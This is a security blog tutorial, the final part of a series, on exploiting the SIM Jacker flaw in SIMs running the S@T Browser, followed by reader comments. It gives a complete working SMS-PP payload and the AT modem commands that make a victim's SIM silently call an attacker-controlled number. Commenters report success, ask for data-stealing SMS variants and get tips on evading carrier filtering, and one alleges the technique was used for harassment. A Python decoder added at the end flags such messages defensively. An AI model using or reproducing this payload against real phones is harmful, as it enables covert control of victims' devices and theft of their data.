Dissecting SIM Jacker – Part 4 of 4: Exploitation.


In previous articles (part 1, part 2 and part 3) we have set up the foundation for understanding the details of SIMs, SMS, SMS-Submit, SMS-Deliver, SMS-PP Data Download, Over The Air messages and the SIM Tester tool. In this article we will put all the pieces together and attempt to exploit the SIM Jacker vulnerability on one of our own SIM Cards.

There are 3 main conditions that need to be met in order to exploit this vulnerability: 1) the SMS Center accepts and relays binary messages, 2) the target device is able to receive binary SMS messages that contain (U)SIM Application Toolkit commands, and 3) the S@T Browser technology is deployed on the SIM Card and its Minimum Security Level is set to No Security applied.

Other conditions for the attack to be successful are that the SIM Card itself has 2 capabilities or services enabled: Proactive UICC commands and Data Download to UICC. These services are usually enabled by default on SIM Cards, which is why they are not part of the main conditions.

As we saw in part 3, Over The Air messages are essential for exploiting the vulnerability; in fact, the attack is executed by sending a specific type of OTA message to the victim. Let’s recall the format of an SMS-Submit message that will work as an OTA message:

OTA / SMS-PP Data Download message.

This is the format of an SMS-Submit message, that is, the message that originates from the attacker and is sent through the USB Modem. Let’s go through it piece by piece:

Service Center Address (SCA)

The first piece is the Service Center Address, the address of the SMS Center, that is, the part of the provider’s infrastructure that relays messages. As we have mentioned in a previous article, this field can be set to its default value (the value already stored in the SIM Card) by using 0x00, so the first piece is:

SCA = 0x00

First Octet (FO)

The second piece is the First Octet. From a previous article we learnt that the coding of the first octet for an SMS-Submit is as follows:

SMS-Submit first octet.

Since this is an SMS-Submit, we start by setting bits 0 and 1 to "01"; this is the MTI (Message Type Identifier). The other bits can be set to zero, except for bit 6, which needs to be set to "1"; this is the UDHI (User Data Header Indicator). So the binary coding for the first octet will be:

01000001 = 41 in hex.

So, our second piece is:

FO = 0x41

Message Reference (MR)

The third piece is the Message Reference, which can be set as follows:

MR = 0x00

Destination Address (DA)

The Destination Address is the address of the target. This value is coded as follows (the digits are stored as swapped semi-octets, with F as filler for the odd digit):

Length of address = 0x0B
Type of address = 0x91 (international)
Address = 50612345678F = 0x0516325476F8

So:

DA = 0x0B910516325476F8

Protocol Identifier (PID)

The Protocol Identifier has to be set to SIM Data Download, that is:

PID = 0x7F

Data Coding Scheme (DCS)

The Data Coding Scheme has to be set to Class 2, that is:

DCS = 0xF6

User Data Length (UDL)

The User Data Length is the length in bytes of the user data, that is, the number of bytes that comprise the User Data Header and the Command Packet together:

UDL = XX

User Data (UD)

The User Data contains the User Data Header and the Command Packet. Recall that in the First Octet we set the UDHI (User Data Header Indicator) to indicate that the User Data will contain a User Data Header.

User Data Header Length (UDHL)

The User Data Header Length is the length in bytes of the User Data Header and is set as follows:

UDHL = 0x02

User Data Header (UDH)

The User Data Header is set so that it indicates that the Command Packet will contain Security Headers, that is:

UDH = 0x7000

Command Packet (CP)

The Command Packet contains very important information: the security applied to the message, the application the message is directed to, and the actual commands that we want to execute.

Command Packet Length (CPL)

The Command Packet Length is the length in bytes of the entire Command Packet:

CPL = YYYY

Command Header Length (CHL)

The Command Header Length is the length in bytes of the Command Header:

CHL = 0x0D

The Command Header comprises 6 different values:

Security Parameter Indicator (SPI)

The Security Parameter Indicator specifies whether or not any security (integrity check, ciphering) will be applied to the message. In this case we set SPI as follows:

SPI = 0x0000

Ciphering Key Identifier (KIc)

The Ciphering Key Identifier identifies the type of ciphering used, we set this to:

KIc = 0x00

Key Identifier (KID)

The Key Identifier specifies the key that will be used for encryption, we set this to:

KID = 0x00

Target Application Reference (TAR)

The Target Application Reference identifies the application on the SIM Card we will be sending the message to. We set it to the S@T Browser:

TAR = 0x505348

Counter and Padding Counter (CNTR & PCNTR)

These values are set as follows:

CNTR = 0x0000000000
PCNTR= 0x00

Secured Data (S@T/STK Commands)

This is the most important part of the payload: it contains the commands that we want the S@T Browser application to execute on our behalf. These commands are constructed using STK Bytecode, which can be used, for example, to Set Up a Call and Send Short Messages.

The S@T/STK Commands are set as follows:

S@T/STK Commands = 0x42230121…2D0C100383…2B00

For security reasons, I won’t provide the entire hex representation of these commands, as this could be used to abuse this vulnerability in the wild.

Proof of Concept

For our proof of concept below, we will be using bytecode commands that set up a call on the device of our victim to another device controlled by the attacker.

The victim does not notice that he/she has received the message, but a prompt is shown to the user for accepting the call. Using bytecode commands we could, for instance, also make the victim send a short message with sensitive information without the user even noticing.

SMS-Submit

Therefore, our SMS-Submit message looks like this:

SMS-Submit exploiting SIM Jacker.

Which is the same as shown below (where XX and YYYY are just the lengths of the bytes that follow them):

0041000B910516325476F87FF6XX027000YYYY0D0000000050534800000000000042230121…2D0C100383…2B00

Sending the message

As we saw in part 1 of this series, we will be using a USB modem to send our attacking message. To do so, we connect to the modem with screen:

screen /dev/ttyUSB0

We now enable PDU mode:

AT+CMGF=0 (ENTER)
OK

And finally send the message (see the end of this article for an update on the full payload):

AT+CMGS=69 (ENTER)
>0041000B910516325476F87FF6XX027000YYYY0D0000000050534800000000000042230121…2D0C100383…2B00 (CTRL + Z)

The Victim

The victim receives the message as an SMS-Deliver which, in turn, is transformed into an SMS-PP Data Download. That transformed message is handled by the SIM Card (since it is a binary message), and the SIM Card application (S@T Browser) executes the S@T/STK commands specified in the message itself; in this case, that means setting up a call.

Do note that the victim does not notice that he/she has received an SMS; however, for this specific proof of concept, the victim receives a prompt for accepting the call (to an attacker-controlled device), so the victim will see something like what is shown below (do note that the attacker could also execute other actions, like sending an SMS message with sensitive information):

SIM Jacker victim.

If the victim accepts the call, the victim will call the attacker-controlled number we have set up in the Secured Data (S@T/STK Commands). We can see this in the following video:

Exploiting SIM Jacker.

That’s it! Thanks!

UPDATE (07/12/2020)

It’s been a while since this publication, so I thought I’d share the whole payload for the sake of completeness. The AT command with the SMS-SUBMIT message is as shown below (with a TPDU length of 69):

AT+CMGS=69
>0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00

Do note that the target of the attack is specified as the first instance of 2143658709F0, and the second instance is the phone number the target SIM will call (since we are dealing with an STK command to set up a call).

The value 2143658709F0 means the phone number is (123) 45678900.
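As an added example (not the article’s own code), the following Python decoder takes the SMS-Submit layout walked through above, runs it over the full payload from this update, and reports the fields an SMS Center filter or SIM auditor would key on (PID, DCS class, UDH, SPI, TAR). BENIGN_PDU is a constructed plain text message, included to show that ordinary SMS traffic is not flagged.

```python
# Added example, not the article's own code: decodes the SMS-Submit layout
# described above and reports why an SMSC filter or SIM auditor would flag it.
# SAMPLE_PDU is the full payload from the article's update; BENIGN_PDU is a
# constructed plain 8-bit text message ("hi") for contrast.
S_AT_BROWSER_TAR = bytes.fromhex("505348")   # TAR the article assigns to S@T
PID_SIM_DATA_DOWNLOAD = 0x7F

SAMPLE_PDU = (
    "0041000B912143658709F07FF638"  # SCA FO MR DA PID DCS UDL
    "0270000033"                    # UDHL UDH CPL
    "0D00000000505348000000000000"  # CHL SPI KIc KID TAR CNTR PCNTR
    "42230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00"
)
BENIGN_PDU = "0001000B912143658709F00004026869"   # no UDHI, PID 0x00, DCS 0x04

def decode_bcd_number(data: bytes) -> str:
    """Undo the semi-octet swap used in addresses (21 43 .. F0 -> 1234..0)."""
    out = "".join(f"{byte & 0x0F:X}{byte >> 4:X}" for byte in data)
    return out.rstrip("F")

def parse_sms_submit(hex_pdu: str) -> dict:
    """Split an SMS-Submit PDU (optionally with a 0x70 UDH) into its fields."""
    b = bytes.fromhex(hex_pdu)
    pos = 1 + b[0]                          # SCA length 0x00: SIM's default SMSC
    fo, mr, da_digits, da_toa = b[pos], b[pos + 1], b[pos + 2], b[pos + 3]
    da_bytes = (da_digits + 1) // 2
    da = decode_bcd_number(b[pos + 4:pos + 4 + da_bytes])
    pos += 4 + da_bytes
    pid, dcs, udl = b[pos], b[pos + 1], b[pos + 2]
    ud = b[pos + 3:pos + 3 + udl]
    if len(ud) != udl:
        raise ValueError("UDL does not match the bytes present")
    msg = {"tpdu_len": len(b) - 1 - b[0], "fo": fo, "mr": mr, "da": da,
           "da_toa": da_toa, "pid": pid, "dcs": dcs, "udl": udl}
    if not fo & 0x40:                       # UDHI clear: no header, no command packet
        msg["ud"] = ud
        return msg
    udhl = ud[0]
    msg["udh"] = ud[1:1 + udhl]
    cp = ud[1 + udhl:]
    cpl = int.from_bytes(cp[:2], "big")
    body = cp[2:2 + cpl]
    if len(body) != cpl:
        raise ValueError("CPL does not match the bytes present")
    chl = body[0]
    hdr = body[1:1 + chl]                   # SPI KIc KID TAR CNTR PCNTR
    msg.update({"cpl": cpl, "chl": chl, "spi": hdr[0:2], "kic": hdr[2],
                "kid": hdr[3], "tar": hdr[4:7], "cntr": hdr[7:12],
                "pcntr": hdr[12], "secured_data": body[1 + chl:]})
    return msg

def audit(msg: dict) -> list:
    """Reasons a defender would flag this message (empty for ordinary SMS)."""
    reasons = []
    if msg["pid"] == PID_SIM_DATA_DOWNLOAD:
        reasons.append("PID 0x7F: SIM Data Download, handled by the SIM, not shown to the user")
    if msg["dcs"] & 0xF3 == 0xF2:           # coding group 1111, message class 2
        reasons.append("DCS class 2: message is routed to the (U)SIM")
    if msg.get("udh") == b"\x70\x00":
        reasons.append("UDH 0x7000: a command packet with security header follows")
    if "spi" in msg and msg["spi"][0] & 0x07 == 0:
        reasons.append("SPI: no integrity check and no ciphering on the command packet")
    if msg.get("tar") == S_AT_BROWSER_TAR:
        reasons.append("TAR 505348: addressed to the S@T Browser")
    return reasons
```

Calling `audit(parse_sms_submit(SAMPLE_PDU))` returns all five reasons, and `parse_sms_submit(SAMPLE_PDU)["tpdu_len"]` gives the 69 passed to AT+CMGS, while the benign message yields an empty list.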

53 Comments

  1. … Deck tag attributes presence flag should be set, due to the reason that dynamic deck will not be cached by the S@T browser

    1. Hello, thanks for your comment,

The Deck Tag ID is set after “0x42230121” and followed by the rest of the payload; however, I didn’t think it was a good idea to give up the entire payload, so I cropped it.

      Regards,
      Cristian

  2. Hi Cristian, thanks for your explanation!

About the payload, do you build it manually, or is there a lib or something to create them?

    Regards,
    Fernando

    1. Hello, thanks for your comment.

      Mostly manually, by going through the STK bytecode documentation and also with the help of open tools such as the SIM Tester by SRLabs. Thanks!

      Regards,
      Cristian

  3. Hi, as I’m relatively new to these types of vulnerabilities associated with sims, I can’t quite understand the STK bytecode documentation. Could you tell me where to start to learn this type of vulnerability so that I can generate the payload on my own?

  4. Hi, thanks for the article.
Do you set any variables before the STK command? Or do you follow the order: push > deck > card > STK command?

    1. Hi Pedro,

      I start by constructing the SMS-SUBMIT message and, when it comes to the S@T Setup Call part I follow the Push (0x42) > Deck > Card > Generic STK Command (2D). And this generic command follows the Setup Call (0x10) > Qualifier (0x03) > DestinationTag (0x83) > AddressTag (06) > Address (0x91…) > 2B00 format.

      Regards,
      Cristian

Did you use Deck > Card template tag > Card, or just Deck > Card? Does the setup call have an Alpha identifier “Accept call?”? Is the “2B00” the Exit tag without length?

      Thanks, Pedro.

    3. Hello, please note that I have recently added an update to the end of this article, go ahead and take a look at it.

      Thanks,
      Cristian

  5. I have a question about figure 3 of the adaptiveMobile security report. The final step is setting payload as variable 5. But how can we set variable as SMS data (The SMS data of the STK SEND-Short-Message)?

    1. Hello, please note that I have recently added an update to the end of this article, go ahead and take a look at it.

      Thanks,
      Cristian

  6. Hi Cristian!

    Great job! Thanks for sharing so much knowledge.

Unfortunately, the links for the files you posted in another comment are unavailable right now and I would very much like to read them.

    (PUSH Command – Section 6
    SAT SetUp Call – Section 5.8.7)

Would you mind uploading a copy somewhere so I can download it?
Thank you so much and congratulations on the great work.

    Regards,

    Elliot

    1. Hello Elliot,

Unfortunately, I didn’t keep a copy of these files; there seems to be a problem with simalliance.org, hopefully the domain will come back online at some point.

      Regards,
      Cristian

  7. Hi Cristian,

I have a SIM card with TAR 505378 “Critical weakness found”, and a network that allows you to send and receive binary SMS; however, when I send the attack nothing happens … Maybe the card does not have the S@T Browser technology? Or is it something from the network?

    Thanks Pedro.

    1. Hi Pedro,

      Those two conditions are usually the most important to meet in order to exploit it. I would make sure to configure the phone numbers correctly (I have added more details on this at the end of the article, go ahead and take a look).

      Also, one of the mitigations is for the SMS center to filter either by message type (binary) or by protocol identifier (PID), this could be the case here, but, I would keep trying since these mitigations are not common.

      Regards,
      Cristian

  8. Thank you! It worked perfectly with my SIM card. I’m trying to use a variable in an STK command, but I’m not getting it. Do you have any idea how to do it?

    1. Hello David,

      Glad to hear it worked fine for you. I haven’t worked with variables in the STK command yet, what goal are you trying to achieve?

      Regards,
      Cristian

  9. Hi Cristian,
    I have 2 SIM cards,
    Both SIM cards are for one operator,
    I receive this message for the SIM card 1 from the SIM Tester:

    The following TARs/keysets accepted and executed a S@T request without any security:
    TAR keyset Response packets
    505348 1 D0128103011003820281830607912143658709F0
    …..

    And SIM Jacker works. (Based on your training)
    But I receive this message for the SIM card 2 from the SIM Tester:

    The following TARs/keysets returned a valid response without any security:
    TAR keyset Response packets
    505348 1 027100000B0A50534800000000000003
    …..

    And SIM Jacker does not work. (Based on your training)

    Why?

    1. Hello,

Hard to say. First I would double check the message configuration; it’s easy to make a simple mistake in the hex code and not get the correct results when sending the attack. I’d also check that both SIMs are using the same SMS Center; it might be the case that they are different and one is vulnerable (relays binary messages without any filtering) while the other is not (does not relay binary messages).

Also, you are receiving 2 different messages: one says “TARs/keysets accepted and executed a S@T request” and the other says “TARs/keysets returned a valid response”. The SIMJacker attack exploits a misconfigured S@T Browser; the second message might hint at a different vulnerability, but it’s hard to say why they would be different if they are from the same provider.

      Thanks,
      Cristian

  10. OK,
    Thanks,
If the SMS center filters binary messages, is there a way to solve it?
For example, using another SMS center or anything else…

    1. There is not much you can do with the SMS Center itself as this is controlled by the service provider.

You could try to force the SIM Card to use a different SMS Center. You would specify that in the first field of the SMS-Submit message; this first field is known as the SCA (Service Center Address) and you could use it to specify a different SMS Center.

In the example described in the article above we are using “00” as the SCA, which means that the SIM Card will use the default SCA already stored in the SIM information. The idea would be to set this field to a specific value instead, so that the SIM uses a different SMS Center.

      Regards,
      Cristian

  11. Hello Cristian,
Can I convert the User Data (UD) to GSM 7-bit (instead of 8-bit)
and change the Data Coding Scheme (DCS) from 8-bit to 7-bit (class 2 – SIM/USIM-specific)?
For example 0xF6 —> 0xF2
Because my provider does not support DCS for 8-bit, like 0xF6.
It only supports DCS for 7-bit, like 0xF2.
Of course it supports class 2.
I do not have access to another SMS center.
    Thanks…

    1. Hello Alex,

      It should work in my opinion, but I’m not sure! My thinking is that as long as both the SMS center and the SIM card support the 7 bit DCS, then you should be able to code data using that scheme.

      Regards,
      Cristian

  12. Hello Cristian,
Can you help me with how to convert data from binary 8-bit to GSM 7-bit?
I do not know which part of the PDU to convert and how to convert it correctly.
    What should I change, add or remove?
    I tried hard but I couldn’t.
    I do not know what I am doing wrong.
    I just want an example.
    Please…
    Thanks.

My provider has several SMS centers.
But when I use an SMSC other than the default SMSC, there is no change and only the default SMSC is used.
    I tested this both in the AT command (PDU) and on Android.
    Why?

    1. Hi Jessie,

      You should be able to set the SMS Center (SCA) in the first byte of the SMS-SUBMIT message. If that does not work, I believe you should also be able to set the SCA with the +CSCA AT command.

      Regards,
      Cristian

  14. Hello,
    As I said in the previous comment,
    My SIM card received this message from SIMTester results:

    The following TARs/keysets returned a valid response without any security:
    TAR keyset Response packets
    505348 1 027100000B0A50534800000000000003

    This is command:

    FUZZER = 14 – KEYSET = 1 – SPI = 1C31 – KIC = 15 – KID = 10 – TAR = 505348 – CNTR = 0000000001 – PCNTR = 05

    This is response:

    027100000B0A50534800000000000003 (Status: 03 – Error: CNTR high)

    I asked srlabs.de about it and they answered me:

The vulnerability you found is an application on the SIM that appears to be unprotected [1].

    Leaving an applet unprotected is never a good idea, so this is reported as a vulnerability without knowing what exactly the applet does.

    In this particular case, you have indeed found Simjacker since the applet in question is the S@T Browser [2].

    Hope this helps,

    -Karsten

    [1] https://srlabs.de/bites/sim_attacks_demystified/
    [2] https://securitygrind.com/dissecting-sim-jacker-part-4-of-4-exploitation/

    But SIM Jacker does not work. (Based on your training)

    Why?

    1. From the SIMTester result it does look like it is vulnerable, but I wouldn’t be able to say why it’s not working.

As mentioned before, I’d recommend you go through the payload again and make sure everything is in the right place. Other than that I can only advise you to keep trying; maybe testing on another SIM Card might be a good idea at this point.

      Regards,
      Cristian

    2. hello can i get your number.. if you can get this number pls check on whatsapp +255627257164

    1. Hi Kumar,

      I’m not sure where it can be downloaded from, however, it usually comes in the SIM Card by default, I believe it is widely used by providers.

      Regards,
      Cristian

    1. Hello,

      I do not have the payload for Short Message, but certainly is an interesting case.

      Regards,
      Cristian

I have the SMS payload but it stopped working after some update; they changed the dialing numbering. I think it’s easy to fix it back, but I’ve been busy and haven’t fixed it yet.

    1. Hello,

      I only worked on the call payload but not the SMS payload. You’re welcome to share the SMS payload here for everybody to take a look at it.

      Regards,
      Cristian

I have the payload for SMS; it stopped working after some call update. I think it’s fixable, can someone help?

    1. Hello,

I can take a look at it if you share more details on what you are doing and what issues you are facing.

      Regards,
      Cristian

Hi, thank you, this is the best post on SIM Jacker.
I learned many things from you.

I need to know how to make the payload; I downloaded all the PDFs but this is hard to learn.
Can you explain
    S@T COMMAND SETUP CALL
    42 230121 020744382E313035310516060431303531 2D 0C 10 03 83 06 0791 2143658709F0 2B00
    Push (0x42)
    Deck ?
    Card ?
    Generic STK Command (2D)
    Setup Call (0x10)
    Qualifier (0x03)
    DestinationTag (0x83)
    AddressTag (06)
    Address (0x91…)
    2B00 format ?

020744382E313035310516060431303531 – this code, please.

    1. Hello,

      Thanks for the comment. There is a full payload example at the end of the article (which I added afterwards), might help you get a better idea of it.

      Regards,
      Cristian

Hello Cristian, sorry for the double post, I thought it didn’t upload. Is there a way to send you the SMS payload? I don’t want to post it here; we use it to help people and don’t want it to get into the wrong hands, you know.

Hello Cristian, I’ve got to the point of dissecting your payload, to identify where the tags and bytecodes came from.
I can send an SMS-SUBMIT in PDU format without the payload successfully, but when I send your payload to a number, the command returns “CMS ERROR 513” or “CMS ERROR 515”.
I’ve only modified your payload to change the receiver’s number and the number to be called. I’m using a USB modem to send the SMS. Can you help me work this out?

  20. Hello Cristian R

How can we contact you? We have found some topics to cooperate with you on.

    Thanks Islombek

Hello Cristian, first of all thanks for the amazing knowledge that you shared in this article, but I would like to inquire whether these payloads are still valid, because I was trying them out and it gives me a +CMS OK but nothing happens on the target device, and the SIM card in the modem is also charged.

Looking for a guy called skewetande here. I believe he piggybacked off your knowledge to harass his neighbor.

Hello, is there a way to switch off binary SMS reception in the device? Perhaps if the phone is rooted, with some app? Because if the SMS center relays binary SMSs and the SIM card has the S@T browser, what else could one do to stop these vulnerabilities?

Hi, I would like to understand something more. How can I tell whether SIMs today are protected or not? When an operator sends you text messages in the background that you don’t see, to configure the connection parameters, should I assume that the bug is still active? How can I modify and protect the SIM?
